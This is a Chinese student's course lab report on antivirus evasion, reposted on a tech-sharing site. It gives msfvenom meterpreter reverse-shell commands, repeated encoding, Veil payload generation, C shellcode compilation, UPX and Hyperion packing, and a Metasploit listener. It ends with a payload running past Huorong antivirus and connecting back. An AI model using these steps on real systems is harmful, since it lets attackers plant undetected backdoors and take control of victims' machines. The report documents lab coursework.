标签：exe 免杀 学号 shellcode 20192411 生成 2021 msfvenom veil

学号20192411 2021-2022-2 《网络与系统攻防技术》实验3实验报告

• 学号20192411 2021-2022-2 《网络与系统攻防技术》实验3实验报告
  • 1.实验内容
  • 2.实验过程
    • 2.1 正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧
      • 2.1.1 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
      • 2.1.2 veil，加壳工具
      • 2.1.3 使用C + shellcode编程
    • 2.2 通过组合应用各种技术实现恶意代码免杀
    • 2.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本
  • 3.问题及解决方案
  • 4.问题回答
  • 5.学习感悟、思考等
  • 参考资料

1.实验内容

(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

• 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
• veil，加壳工具
• 使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀

如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

2.实验过程

2.1 正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

2.1.1 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件

• 先用msfvenom直接生成可执行文件，检出率为52/69，接着以此为参照。

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 PORT=443 -f exe > 2411.exe
  

  

• 接着用msf编码器进行一次编码：

  msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.110 LPORT=443 -f exe > 2411_1.exe
  

  检出率仍是52/69：

  

  再用msf编码器编码10次：

  msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.1.110 LPORT=443 -f exe > 2411_10.exe
  

  检出率还是没有变化：

  

  原因：AV厂商研究的是编码器本身，只需要针对msf编码器生成的exe的固定特征检测，就可以检测出来。

• 尝试用msfvenom生成jar文件：

  msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.110 PORT=443 -f jar > 2411_jar.jar
  

  

• 尝试用msfvenom生成php文件：

  msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.110 PORT=443 x> 2411_php.php
  

  

2.1.2 veil，加壳工具

• 首先安装veil：

  apt -y install veil  # 问题1
  

• 进入veil

  

  选择工具1Evasion：

  use 1
  

  再用list查看Available Payloads：

  list
  

  

  然后选择7：

  use 7
  

  接着就设置IP和端口，然后生成文件：

  set LHOST 192.168.56.107
  set LPORT 443
  generate
  

  

  根据生成的文件所在的路径就可以找到exe文件，再检测exe文件的检出率：

  

2.1.3 使用C + shellcode编程

• 用如下指令生成一个c语言格式的Shellcode数组：

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=443 -f c
  

  

  新建一个c文件，将刚刚生成的数组写入到程序：

  vi 2411_Shellcode.c
  

  

  编译生成的c文件：

  i686-w64-mingw32-g++ 2411_Shellcode.c -o 2411_Shellcode.exe
  

  检测刚刚编译得到的exe文件：

  

2.2 通过组合应用各种技术实现恶意代码免杀

• 结合C + shellcode编程、压缩壳、加密壳

  生成一段C语言shellcode（上一步骤生成的是在旧的kali系统，故这里再生成一个）：

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.107 LPORT=443 -f c 
  

  将生成的C语言shellcode放入新建的c文件中：

  

  再编译生成的c文件：

  i686-w64-mingw32-g++ 20192411shellcode.c -o 20192411shellcode.exe
  

  给编译生成的20192411shellcode.exe加压缩壳：

  upx 20192411shellcode.exe -o 20192411shellcode_upx.exe
  

  

  将加完压缩壳的20192411shellcode_upx.exe复制到/usr/share/windows-resources/hyperion中，然后给它再加一个加密壳：

  wine hyperion.exe -v 20192411shellcode_upx.exe 20192411shellcode_final.exe
  

  

  放到主机中，让火绒对其所在文件夹进行查杀，火绒没有发现：

  

2.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

• 生成raw文件：

  msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 9 -b '\x00' lhost=192.168.56.107 lport=443 -f raw -o 20192411.raw
  

• 将生成的raw文件放到主机shellcode_launcher所在文件夹下，主机带有火绒，版本为5.0.66.3：

  

• kali中进入msfconsole控制台，设置相应参数，开启监听：

  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 192.168.56.107
  set LPORT 443
  exploit
  

• 在20192411.raw所在文件夹下打开cmd，执行：

  shellcode_launcher.exe -i 20192411.raw
  

• 监听端监听到连接，接着成功实现反弹：

  

3.问题及解决方案

• 问题1：veil安装时提示wine32没有可安装候选

• 问题1解决方案：更新一下软件库再安装。这期间因为源的问题和网络问题，折磨了很久

  标签：exe,免杀,学号,shellcode,20192411,生成,2021,msfvenom,veil
  来源： https://www.cnblogs.com/hzr2411/p/16125253.html

  本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
  2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
  3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
  4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
  5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。